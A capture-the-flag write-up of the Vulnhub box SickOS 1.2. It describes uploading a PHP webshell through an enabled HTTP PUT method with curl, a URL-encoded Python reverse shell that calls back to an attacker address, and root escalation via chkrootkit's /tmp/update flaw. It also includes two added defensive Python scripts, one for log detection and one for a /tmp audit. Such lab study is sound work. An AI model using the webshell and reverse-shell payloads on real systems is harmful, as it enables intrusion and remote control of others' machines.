This post describes the necessary steps to gain root on SickOS 1.2, available on Vulnhub (https://www.vulnhub.com/). According to the author D4rk (https://twitter.com/D4rk36), this box is similar to the machines in the OSCP labs.
Machine Name: SickOs: 1.2
Resource URL: https://www.vulnhub.com/entry/sickos-12,144/
Release Date: 27 Apr 2016
Summary
To obtain administrative access on this box, the following kill chain was executed.
- Footprinting of the target detected ports 80/TCP and 22/TCP as open.
- Fingerprinting of the web application on port 80/TCP revealed the /test/ directory. This directory has the HTTP PUT method enabled, which allows an attacker to upload arbitrary files and obtain a foothold on the server.
- During privilege escalation, running as user www-data (uid 33), recon identified a vulnerable version of the chkrootkit software.
- Abusing the crontab, the attacker exploits the chkrootkit vulnerability and gains root access.
A quick note before we start: for some reason the author of this box created the crontab routine to execute daily (it only executes at 6AM or something like that), and this configuration forces the attacker to wait. I hacked into GRUB and got a root shell while the VM was booting, and changed the crontab configuration to execute every five minutes.
Here are some links related to gaining a root shell by abusing GRUB, in case you want to reconfigure the crontab to make it less painful.
- https://linoxide.com/linux-how-to/boot-root-shell-prompting-password/
- http://www.c-integration.com/blog/showpost.php/83-reset-linux-root-password-without-knowing-the-password
WriteUp
Recon
In the recon step, using nmap, port 80/TCP was identified running the web server lighttpd 1.4.28.
Against the web application served by lighttpd 1.4.28, gobuster (https://github.com/PentestBox/gobuster) was used to brute-force files and directories, identifying the index.php file and the /test/ directory.
index.php contains no information that could be used to compromise the box.
In the /test/ directory, the recon identified that the HTTP PUT method is enabled.
Exploitation
The enabled HTTP PUT method allowed the attacker to upload arbitrary files to the target server. Several ways of exploiting this vulnerability were tested, using nmap, the Metasploit console (msfconsole) and curl; all techniques succeeded in uploading the file.
# Abusing PUT method with CURL to upload arbitrary files in the server.
curl -X PUT -d '<?php system($_GET["c"]);' http://192.168.56.103/test/1.php
The file uploaded to the target system allowed the attacker to execute remote commands. The attacker used the previously uploaded webshell to gain the initial foothold on the server. The first shell on the system runs as user www-data (uid 33). The following request to the webshell executes a Python reverse shell that connects back to the attacker machine.
http://192.168.1.115/test/msfupload.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.144%22,8080));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
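From the defender's side, both steps above (the PUT upload and the later request that drives the uploaded script) leave a clear trace in the web server's access log. The following is an added example, not part of the original writeup: it parses constructed log lines in lighttpd's default accesslog layout (assumed here; the same regex also fits Apache CLF) and flags successful PUT writes, then any request to a file created that way carrying query parameters.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in lighttpd's default accesslog layout:
# client vhost user [time] "request" status bytes "referer" "agent".
SAMPLE_LOG = """\
192.168.1.144 192.168.56.103 - [20/May/2016:06:01:10 +0000] "GET /index.php HTTP/1.1" 200 163 "-" "Mozilla/5.0"
192.168.1.144 192.168.56.103 - [20/May/2016:06:01:31 +0000] "PUT /test/1.php HTTP/1.1" 201 0 "-" "curl/7.47.0"
192.168.1.144 192.168.56.103 - [20/May/2016:06:01:40 +0000] "PUT /test/notes.txt HTTP/1.1" 201 0 "-" "curl/7.47.0"
192.168.1.144 192.168.56.103 - [20/May/2016:06:02:05 +0000] "GET /test/1.php?c=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
10.0.0.7 192.168.56.103 - [20/May/2016:06:03:00 +0000] "PUT /test/x.php HTTP/1.1" 403 0 "-" "curl/7.47.0"
"""

# Three tokens precede the bracketed timestamp in both lighttpd's default
# format and Apache CLF, so one pattern serves both.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Extensions the web server would execute rather than serve as data.
EXEC_EXT = ('.php', '.phtml', '.cgi', '.pl', '.py', '.sh')

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def detect_webshell_activity(log_text):
    """Flag successful PUT uploads, then any later request that drives an
    uploaded script with query parameters. Returns (severity, client, message)."""
    uploaded = set()
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec['status'].startswith('2'):
            continue  # unparsable or rejected (e.g. 403) requests are not writes
        url = urlsplit(rec['target'])
        path = unquote(url.path)
        if rec['method'] == 'PUT':
            uploaded.add(path)
            sev = 'high' if path.lower().endswith(EXEC_EXT) else 'medium'
            findings.append((sev, rec['client'], 'PUT created ' + path))
        elif path in uploaded and url.query:
            params = sorted(parse_qs(url.query))
            findings.append(('critical', rec['client'],
                             'request to uploaded file %s with params %s' % (path, params)))
    return findings

if __name__ == '__main__':
    for sev, client, msg in detect_webshell_activity(SAMPLE_LOG):
        print('[%s] %s %s' % (sev.upper(), client, msg))
```

On a real host, feed it the contents of lighttpd's accesslog file instead of SAMPLE_LOG; any 2xx PUT at all is worth an alert on a server that is not meant to accept uploads.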
Privilege Escalation
In the privilege escalation step, Linux Exploit Suggester (https://github.com/mzet-/linux-exploit-suggester) was run against the target system and identified the chkrootkit vulnerability.
The advisory for the chkrootkit vulnerability (https://www.exploit-db.com/exploits/33899) explains that /tmp must be mounted without the noexec flag for the attack to succeed.
The /tmp directory is properly mounted and does not have the noexec flag enabled.
To exploit this vulnerability, the attacker created the file /tmp/update; chkrootkit executes this file, so the instructions inside it run with root privileges. In the /tmp/update file, some commands to confirm that the file was executed and two ways to obtain root access on the server were placed: the first creates a SUID binary owned by root, which the attacker can then execute to get root access, and the second is a Python script which connects back to the attacker machine and spawns a shell with root privileges.
When the crontab routine executes, some files are created in the /tmp directory and the attacker can execute the SUID binary to get root access.
The crontab routine also executes the Python script, which sends a reverse shell to the attacker machine. The reverse shell runs with root privileges, granting the attacker administrative access. With root access, the flag is owned.
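The whole escalation hinges on two host conditions: /tmp being executable, and a file named /tmp/update (or a setuid binary dropped beside it) sitting where the root cron job will find it. The following audit script is an added example, not part of the original writeup or of chkrootkit; it checks those conditions against constructed /proc/mounts content and a constructed directory listing, and the live_tmp_files() helper (assumed name) gathers the same data from the real /tmp.

```python
import os
import stat

# Constructed /proc/mounts content: /tmp is its own mount but lacks noexec,
# which is exactly the precondition the chkrootkit advisory relies on.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,relatime 0 0
"""

def tmp_mount_options(mounts_text):
    """Mount options of /tmp as a set, or None if /tmp is not a separate mount."""
    for line in mounts_text.splitlines():
        f = line.split()
        if len(f) >= 4 and f[1] == '/tmp':
            return set(f[3].split(','))
    return None

def audit_tmp(mounts_text, tmp_files):
    """tmp_files maps each entry name in /tmp to its st_mode (as from os.lstat).
    Returns (severity, message) findings for the conditions this box depends on."""
    findings = []
    opts = tmp_mount_options(mounts_text)
    if opts is None:
        findings.append(('medium', '/tmp is not a separate mount, so noexec cannot apply'))
    elif 'noexec' not in opts:
        findings.append(('medium', '/tmp mounted without noexec: ' + ','.join(sorted(opts))))
    mode = tmp_files.get('update')
    if mode is not None:
        # an executable /tmp/update is what the vulnerable chkrootkit runs as root
        sev = 'critical' if mode & stat.S_IXUSR else 'medium'
        findings.append((sev, '/tmp/update exists (chkrootkit runs it as root)'))
    for name, mode in tmp_files.items():
        if stat.S_ISREG(mode) and mode & stat.S_ISUID:
            findings.append(('critical', 'setuid file in /tmp: ' + name))
    return findings

def live_tmp_files():
    """Name -> st_mode for the real /tmp on this host (lstat, symlinks not followed)."""
    out = {}
    for name in os.listdir('/tmp'):
        try:
            out[name] = os.lstat(os.path.join('/tmp', name)).st_mode
        except OSError:
            pass
    return out

if __name__ == '__main__':
    with open('/proc/mounts') as fh:
        mounts = fh.read()
    for sev, msg in audit_tmp(mounts, live_tmp_files()):
        print('[%s] %s' % (sev.upper(), msg))
```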
Conclusion
This box is pretty fun, straight to hacking. I got stuck in the recon step because I had never seen a PUT HTTP method that was really exploitable in the real world. Identifying the PUT vulnerability took me a while. After this, the chkrootkit vulnerability was something new to me too; it is a weird exploit and, if you don't know, chkrootkit is a security tool that checks whether there are any signs of rootkits on the system, so it is something like exploiting the antivirus. It was the last thing I checked because at first I thought it was less likely to succeed. The daily crontab routine is nonsense; I spent a lot of time on this machine because of it, waiting for the crontab to execute the chkrootkit routine. After a long wait I hacked GRUB and changed the crontab to five minutes, which makes life easier, right?
Resources
- WriteUp: https://g0blin.co.uk/sickos-1.2-vulnhub-writeup/
- WriteUp: https://volta-sec.blogspot.com/2016/10/vulnhub-sickos-12.html
- Reverse Shells Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- Chkrootkit Exploit: https://www.exploit-db.com/exploits/33899
- Exploiting the PUT HTTP Method: https://www.hackingarticles.in/multiple-ways-to-exploiting-put-method/
- GoBuster: https://github.com/PentestBox/gobuster